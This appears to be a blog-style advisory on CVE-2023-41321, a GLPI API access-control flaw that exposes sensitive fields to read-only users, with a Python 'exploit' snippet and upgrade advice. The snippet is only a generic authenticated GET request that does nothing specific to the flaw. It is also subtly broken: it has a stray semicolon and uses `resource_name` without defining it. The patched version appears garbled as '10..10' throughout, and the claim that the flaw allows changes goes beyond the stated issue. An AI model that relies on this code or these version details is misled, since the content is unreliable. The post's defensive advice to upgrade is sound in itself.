CVE-2023-41321: GLPI API Vulnerability Allowing Enumeration of Sensitive Fields - Upgrade to v10..10 Recommended

Recently, a security vulnerability has been discovered in the popular Gestionnaire Libre de Parc Informatique (GLPI) software package. GLPI is an open-source Asset and IT Management software that comes with powerful ITIL Service Desk features, license tracking, and software auditing capabilities. The discovered vulnerability - CVE-2023-41321 - allows an attacker to enumerate sensitive fields values on resources, using the GLPI API, even if they only have read access.

This blog post aims to provide a comprehensive introduction to this vulnerability, including its details, exploit, and the recommended solution. We will also share code snippets demonstrating the vulnerability and links to original references from GLPI's official documentation.

Vulnerability Details

The CVE-2023-41321 vulnerability stems from incorrect access controls in the GLPI API. The issue allows an attacker with read access to resources within GLPI to enumerate, and potentially manipulate, sensitive fields values. This could expose sensitive information or enable unauthorized changes to the affected resources.

Exploit

The vulnerability can be exploited by making specially-crafted API calls to the affected GLPI instance. To demonstrate this, we will provide a Python code snippet that uses the 'requests' library to make an API request to an affected GLPI instance:

import requests

url = 'https://your-glpi-domain.com/apirest.php/{resource_name}';
headers = {
    'Content-Type': 'application/json',
    'App-Token': 'your_app_token',  
    'Session-Token': 'your_session_token'
}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    data = response.json()
    print(f'Enumerated {len(data)} sensitive fields from the {resource_name} resource:')
    for sensitive_field in data:
        print(sensitive_field)
else:
    print('Failed to enumerate sensitive fields:', response.status_code)

In the above code snippet, we send a GET request to the GLPI API using the appropriate credentials (App-Token and Session-Token) and request data from a specific resource (replace resource_name with the target resource). When the script is executed, it will print the number of sensitive fields enumerated and the data obtained for each sensitive field if successful.

Solution

The GLPI team has released a security fix for this vulnerability in version 10..10. Users are strongly advised to upgrade their GLPI installation to this version as soon as possible. Here are the steps to upgrade GLPI:

1. Download GLPI v10..10
2. Follow the official GLPI upgrade documentation to safely update your instance.

References

- GLPI Official Site
- GLPI API Documentation
- CVE Details

Conclusion

The CVE-2023-41321 vulnerability in GLPI is a critical security issue that could lead to data leakage or unauthorized changes to affected resources. It is essential to upgrade your GLPI instance to version 10..10 to address this vulnerability. As always, stay vigilant in keeping your application and server environment up to date with the latest security patches.

Timeline

Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/29/2023 18:13:00 UTC